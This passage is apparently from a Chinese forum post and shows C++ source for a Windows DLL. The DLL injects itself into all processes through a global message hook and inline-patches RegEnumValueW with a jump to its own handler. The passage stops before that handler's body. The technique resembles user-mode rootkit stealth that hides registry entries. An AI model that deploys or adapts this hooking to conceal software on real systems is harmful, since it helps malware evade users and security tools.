dll代码如下: #include "stdafx.h" #pragma data_seg(".shared") DWORD ProtectingPid = 0; #pragma data_seg() HMODULE MyModuleHandle;HHOOK hhk = NULL;DWORD MyPid = 0;unsigned char Store[10]; long _stdcall SelfInject();long _stdcall SelfEject(); LRESULT CALLBACK GetMsgProc(int nCode,WPARAM wParam,LPARAM lParam);LONG WINAPI RegEnumValue2( HKEY hKey, DWORD dwIndex, LPTSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData ); void HookAPI();void UnHookAPI(); BOOL APIENTRY DllMain( HANDLE hModule, DWORD reason, LPVOID lpReserved ){ if (reason == DLL_PROCESS_ATTACH) { HookAPI(); MyModuleHandle = (HMODULE)hModule; MyPid = GetCurrentProcessId(); } return TRUE;} long _stdcall SelfInject(){ ProtectingPid = MyPid; hhk = SetWindowsHookEx(WH_GETMESSAGE,GetMsgProc,MyModuleHandle,0); return (hhk != NULL);} long _stdcall SelfEject(){ return UnhookWindowsHookEx(hhk);} LRESULT CALLBACK GetMsgProc(int nCode,WPARAM wParam,LPARAM lParam){ return CallNextHookEx(hhk,nCode,wParam,lParam);} void HookAPI(){ DWORD OldProtect, NewProtect = PAGE_EXECUTE_READWRITE; HMODULE hmod = GetModuleHandle("Advapi32.dll"); long pa = (long)GetProcAddress(hmod,"RegEnumValueW"); long pa2 = (long)RegEnumValue2; long dAddr = pa2 - pa - 5; unsigned char *p = (unsigned char *)pa; unsigned char *p2 = (unsigned char *)(&dAddr); VirtualProtect((void *)pa,5,NewProtect,&OldProtect); for (int i=0;i<5;i++) Store[i] = p[i]; p[0] = (unsigned char)0xE9; for (int i=0;i<4;i++) p[i + 1] = p2[i]; VirtualProtect((void *)pa,5,OldProtect,&NewProtect);} void UnHookAPI(){ DWORD OldProtect, NewProtect = PAGE_EXECUTE_READWRITE; HMODULE hmod = GetModuleHandle("Advapi32.dll"); long pa = (long)GetProcAddress(hmod,"RegEnumValueW"); unsigned char *p = (unsigned char *)pa; VirtualProtect((void *)pa,5,NewProtect,&OldProtect); for (int i=0;i<5;i++) p[i] = Store[i]; VirtualProtect((void *)pa,5,OldProtect,&NewProtect);} LONG WINAPI RegEnumValue2(